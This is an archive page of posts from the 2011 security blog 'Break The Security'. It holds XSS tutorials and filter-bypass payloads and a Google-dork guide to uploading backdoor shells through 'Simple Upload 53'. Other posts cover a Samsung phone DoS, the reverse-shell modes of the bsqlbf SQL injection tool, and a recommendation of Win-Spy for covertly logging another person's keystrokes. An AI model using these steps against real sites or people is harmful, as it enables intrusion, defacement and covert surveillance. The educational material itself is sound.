Sometimes putting "> at the beginning of the code will work.

"><script>alert("Hi");</script>

This will end the previous opened tag and open our script tag.
Example:
hxxp://vulnerable-site/search?q="><script>alert("Hi");</script>

Conclusion:
From above article, it is clear that XSS filters alone not going to protect a site from the XSS attacks. If you really want to make your site more secure, then ask PenTesters to test your application or test yourself.

Also there are lot of different filter bypassing technique, i just covered some useful techniques for you.


Continue   Reading>>

Sunday, December 4, 2011

"Simple Upload 53" Vulnerability allows Hacker to upload Shell


Web Application vulnerability in "Simple Upload 53" PHP file allows an attacker to upload Backdoor shell code in your website.

"inurl:simple-upload-53.php"
using this google search , you can find the vulnerable Sites.

If you want to find the vulnerability in your web application, use this google dark:
"inurl:simple-upload-53.php site:Your-Site.com"

After you search in google; if you find any page ends with "simple-upload-53.php" , follow the link.

Example:
hxxp://www.target_site.com/simple-upload-53.php

Now you can see the upload option in the site.  Here is the biggest problem, it allows anyone to upload files.

An attacker can upload Backdoor shell as ".php.jpg" or ".php.gif" etc.

The uploaded shell will be in this place:
 hxxp://www.target_site.com/files/Your_file_With_Extension

After uploading the shell , an attacker can deface your site. So better check  whether your site also has this vulnerability or not.

"Prevention is better than Cure".
Continue   Reading>>

Wednesday, November 16, 2011

Self-XSS (Cross Site Scripting) ~ Social Engineering Attack and Prevention


Last time , I have explained about the Clickjacking attack and prevention.  Today,  i am going to explain about the Self-XSS(Cross Site Scripting) Attack

What is Self-XSS?
Self-XSS is one of the popular Social Engineering Attack used by Attackers to trick users into paste the malicious code in browser.  Results in attacker accessing to the whatever website you visit. Usually scammers use this attack for tricking users to buy products or get money through online survey .

Recently, Hackers Attacked Facebook with explicit hardcore porn images. Facebook says it might be self-Xss Attack .

Javascript can be executed in browser url bar.
For example , enter the following code in your browser:
javascript:alert('BreakTheSecurity');
This will show a pop up box with "BreakTheSecurity".  An attacker can use this for malicious purpose. He can steal Confidential data, cookies, redirect to malware sites and more.
For Eg:
Entering the following code will display the cookies in your browser:
javascript:alert("Cookies:"+document.cookies+"  "+"\n By \n BreakTheSecurity");

The above code is not going to anything maliciously other than displaying the cookies.  But an attacker can extend the script so that it can take advantage your data.

Security Tips from BreakTheSecurity:
  • Use NoScript add on that will prevent javascript running in your browser.
  • Don't click the shorthand urls for Example: bit.ly/55ewEb?22.  This may redirect to an infected sites. 
Aware of Social Engineering:
  • If anyone ask you(even if he is your friend) to paste the scripts in browser bar, Never do this mistake.  
  • If anyone says "Iphone only $10", Don't eager to click it. 
  • If anyone says "1000 shares will cure a baby", Never do this mistake. Facebook shares never help to get money or help to cure baby.
  • Read our EHN spam report to know the latest updates about the facebook scams.
God give us the Sixth Sense,Use it and think before you click any links or following the other instructions. 
Continue   Reading>>

Thursday, November 10, 2011

Remotely spy on any computer using Win-Spy


Let's say you would like to find what your child is doing with their system, How to do it? buying a spy camera and place in your room?! No, you can just get a Software that will records the logs of activities.

There is a software called "Win-Spy" that will take care of your problem and helps you to find what your child is doing with their system.

This software can be either installed in Local system or Remote system and allows you to monitor the system.

It is capable of capturing whatever the target user sees or type in his keyboard.

You can just get it from here:
http://www.win-spy.com/Download%20WS.html
Continue   Reading>>

Tuesday, November 8, 2011

DoS (denial of service) attack on Mobile phones


As we are in this world influenced by information security, we as security professional have seen many kind of Dos and DDoS attacks happening around the world but what if any one DoS your daily communication Companion ? your mobile device ? and you are just unable to call or operate your phone in proper way ,not even listen to music or even videos ??

Some years back there was DoS possible on a Nokia Phone back in around 2003. but now there is a new way (at least i think so) for performing DoS attack on a Samsung Mobile Phone. Because of auto call reject functionality of the Samsung phones.

Auto call Reject functionality : this function of the Samsung phones is used to block any number to call u so when a person adds any number like xxxxxxxxxx to reject list and if xxxxxxxxxx calls that person ,so the call is automatically gets disconnected , and that number xxxxxxxxxx can not connect a call with you.

Example : if Bob has a Samsung mobile phone and if Bob adds Mak's mobile number to is auto reject list , so when Mak calls Bob it call gets disconnected in first call ring and Bob has just a missed call alert of Mak's call.

Its a nice function of Samsung mobile phones to block unwanted callers but as by the example the rejection function reject call but it shows a missed call alert of that blocked number. This is the main flow (Bug) which allow the DoS happening on the Samsung mobile phones.

Lets take the above example again , Mak's mobile number is in reject list of Bob's Samsung phone so when Mak calls Bob his call ends immediately and with a missed call alert on Bob's phone but if Mak calls Bob in a rate of just a few seconds then ?? - than it performs a DoS on Bob's Samsung mobile phone so if Mak calls Bob in seconds again and again by his phone's auto redial function than bob is unable to receive any on else calls because its going to show busy to that other caller calling Bob. even Bob can not do calls , can not listen to music ,videos or even capture photos because the phone continuously shows missed call alerts of Mak's calls.

It happens because of the missed call alert which takes long to go from the screen on the phone. so if Samsung adds a function like some Chinese phones - they just don't show any alert on the mobile screen and shows entries of blocked calls.

Anyone can just give missed calls to that mobile number for some time so when the user of that Samsung mobile phone adds the number to auto reject list than u can register on mobivox or similar service and just write a Autoit3 script or similar to give missed calls to the person to its a DoS on his Samsung Mobile.

Author : Ashish Mistry, Founder of Hcon
Information Security Researcher, Penetration Tester, Malware Researcher, Trainer

Continue   Reading>>

Thursday, November 3, 2011

What is Clickjacking Attack? How to Prevent? | UI Redressing


Will answering simple maths quiz delete your Social Network account?  If your answer is "No", then check this news Linkedin Clickjacking Vulnerability and come back.  Will visiting a website turn on your webcam? The answer is "Yes".  Check this Flash player clickjacking vulnerability.

If you read above news completely, It will be easy for you to understand  what is clickjacking.  Ok, lets continue to our Article.
Clickjacking also known as UI Redressing,is one of Malicious Technique tricking users to click the button/image that will run hidden malicious script from another site.
An attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the innocuous page. Thus an attacker hijack the click to another website.  That's why it is known as Clickjacking(Click+Hijacking).  The term "clickjacking" was coined by Jeremiah Grossman and Robert Hansen in 2008.

Example:
Lets take the real time example "Linkedin clickjacking vulnerability.
The above image may look like simple maths problem.  Once you click the submit button, it will delete your Linkedin account(if you are logged in) without asking any questions.

Clickjacking Attack can be used for:
  • Tricking users to turn on their webcam and microphone using this adobe vulnerability (this security flaw fixed by adobe)
  • Getting more Twitter Followers
  • Post in your facebook wall.
  • Can delete your profile.

Prevention Techniques:

Client Side(Security tips for users):
Flash Player:
Update your Flash Player(old version are vulnerable to Clickjacking). 

Browser Security Addons: 
Noscript:
Noscript is Mozilla add on that provides protection against clickjacking,XSS and other malicious scripts.  Noscript is available for mobiles also.

Comitari Web Protection Suite: Comitari provides client side protection against ClickJacking (aka UI Redressing) attacks. Installed as browser add-on

GuardedID: It is a commercial product which provides client-side clickjack protection for users of IE or Firefox without interfering with the operation of legitimate iFrames

Server Side( For Developers)
Frame Killer:
Framekiller is javascript snippet that can be used in webpage  to avoid inserting frames from different sources.  This can provide security against frame based clikjacking.
Continue   Reading>>

Friday, October 21, 2011

How to Unlock passcode-protected iPad 2 running iOs 5 with a Smart Cover ?


Video Demo:


Temporary solution is after the break:
We have discovered that you can temporarily fix this bug by disabling Smart Cover unlocking in the iPad 2 settings menu under the General tab.


Disclaimer:
This video is not created by us. We just sharing this to know about the vulnerability.
Continue   Reading>>

Friday, October 14, 2011

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability



What is XSS?
Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.

In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.
Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.
It will be easy to understand XSS , if you have the following prerequisite:
  • Strong Knowledge in HTML,javascript(Reference).
  • Basic Knowledge in HTTP client-Server Architecure(Reference)
  • [optional]Basic Knowledge about server side programming(php,asp,jsp)

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use google dork for finding the vulnerable sites for instance  "?search=" or ".php?q=" .  1337 target specific sites instead of using google search.  If you are going to test your own site, you have to check every page in your site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.


Test 1 :
Once we found the input field, let us try to put some string inside the field, for instance let me input "BTS". It will display the  result .

Now right click on the page and select view source.   search for the string "BTS" which we entered in the input field.  Note the location where the input is placed.

Test 2:
Now we are going to check whether the server sanitize our input or not.  In order to do this , let us input the <script> tag inside the input field.
View the source of the page . Find the location where input displayed place in previous test.

Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this &lt;script&gt;. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack.  But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code.  For instance, let us input <script>alert('BTS')</script> .

Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS .  By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.

Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

For Example:   
Many websites host a support forum where registered users can ask their doubts by posting message  , which are stored in the database.  Let us imagine , An attacker post a message containing malicious javascript code instead.  If the server fail to sanitize the input provided, it results in execution of injected script.  The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest.  The server embedd the input with the html file and return the file(HTTPResponse) to browser.  When the browser executes the HTML file, it also execute the embedded script.  This kind of XSS vulnerability frequently occur in search fields.

Example:
Let us consider a project hosting website.  To find our favorite project, we will just input the related-word in the search box .  When searching is finished, it will display a message like this "search results for yourword " .  If the server fail to sanitize the input properly, it will results in execution of injected script.

In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser.  The browser then executes the code .

In addition to these types, there is also third  type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

What can an attacker do with this Vulnerability?
  • Stealing the Identity and Confidential Data(credit card details).
  • Bypassing restriction in websites.
  • Session Hijacking(Stealing session)
  • Malware Attack
  • Website Defacement
  • Denial of Service attacks(Dos)

Disclaimer:
This article is intended for educational purpose only.
Continue   Reading>>

Tuesday, October 11, 2011

Automated Blind SQL Injection Attacking Tools~bsqlbf Brute forcer


What is Blind SQL Injection:
Some Websites are vulnerable to SQL Injection but the results of injection are not visible to the attacker.  In this situation, Blind SQL Injection is used. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.

There are plenty of automated Blind Sql Injection tool available. Here i am introducing one of Tool named as bsqlbf(expanded as Blind Sql Injection Brute Forcer).

This tool is written in Perl and allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections
Supported Database:
  • MS-SQL
  • MySQL
  • PostgreSQL
  • Oracle

The tool supports 8 attack modes(-type switch):-
Type 0: Blind SQL Injection based on true and false conditions returned by back-end server

Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.

Type 2: Blind SQL Injection in "order by" and "group by".

Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)

Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)

Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)

Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit

Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs

-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first

Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions

-cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first

For Type 4(O.S code execution) the following methods are supported:

-stype: How you want to execute command:

SType 0 (default) is based on java..will NOT work against XE.

SType 1 is against oracle 9 with plsql_native_make_utility.

SType 2 is against oracle 10 with dbms_scheduler.


Disclaimer:
This Article is for Education purpose only.  The above mentioned software is developed for Penetration testers to test their own Web application Vulnerability. 
Continue   Reading>>

Sunday, October 9, 2011

Learn Web Application Exploits and Defenses for free~Penetration Testing


Are you willing to Learn Web Application Exploitation and Defense against that? Here is the chance for you.   Google Labs provides a Lab to learn Web Application for free of cost.


Penetration Testing :
  • Learn how hackers find security vulnerabilities!
  • Learn how hackers exploit web applications!
  • Learn how to stop them! 
This code lab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you'll get a chance to do some real penetration testing, actually exploiting a real application. Specifically, you'll learn the following:
  • How an application can be attacked using common web security vulnerabilities, like cross-site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF).
  • How to find, fix, and avoid these common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information disclosure, or remote code execution.
To get the most out of this lab, you should have some familiarity with how a web application works (e.g., general knowledge of HTML, templates, cookies, AJAX, etc.).

Gruyere 
This codelab is built around Gruyere /ɡruːˈjɛər/ - a small, cheesy web application that allows its users to publish snippets of text and store assorted files. "Unfortunately," Gruyere has multiple security bugs ranging from cross-site scripting and cross-site request forgery, to information disclosure, denial of service, and remote code execution. The goal of this codelab is to guide you through discovering some of these bugs and learning ways to fix them both in Gruyere and in general.

The codelab is organized by types of vulnerabilities. In each section, you'll find a brief description of a vulnerability and a task to find an instance of that vulnerability in Gruyere. Your job is to play the role of a malicious hacker and find and exploit the security bugs. In this codelab, you'll use both black-box hacking and white-box hacking. In black box hacking, you try to find security bugs by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess server behavior. You do not have access to the source code, although understanding how to view source and being able to view http headers (as you can in Chrome or LiveHTTPHeaders for Firefox) is valuable. Using a web proxy like Burp or WebScarab may be helpful in creating or modifying requests. In white-box hacking, you have access to the source code and can use automated or manual analysis to identify bugs. You can treat Gruyere as if it's open source: you can read through the source code to try to find bugs. Gruyere is written in Python, so some familiarity with Python can be helpful. However, the security vulnerabilities covered are not Python-specific and you can do most of the lab without even looking at the code. You can run a local instance of Gruyere to assist in your hacking: for example, you can create an administrator account on your local instance to learn how administrative features work and then apply that knowledge to the instance you want to hack. Security researchers use both hacking techniques, often in combination, in real life.

They'll tag each challenge to indicate which techniques are required to solve them: 

Challenges that can be solved just by using black box techniques.

Challenges that require that you look at the Gruyere source code.

Challenges that require some specific knowledge of Gruyere that will be given in the first hint.

WARNING: 
Accessing or attacking a computer system without authorization is illegal in many jurisdictions. While doing this codelab, you are specifically granted authorization to attack the Gruyere application as directed. You may not attack Gruyere in ways other than described in this codelab, nor may you attack App Engine directly or any other Google service. You should use what you learn from the codelab to make your own applications more secure. You should not use it to attack any applications other than your own, and only do that with permission from the appropriate authorities (e.g., your company's security team). 

Continue   Reading>>
Older Post Home
 

© Break The Security. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com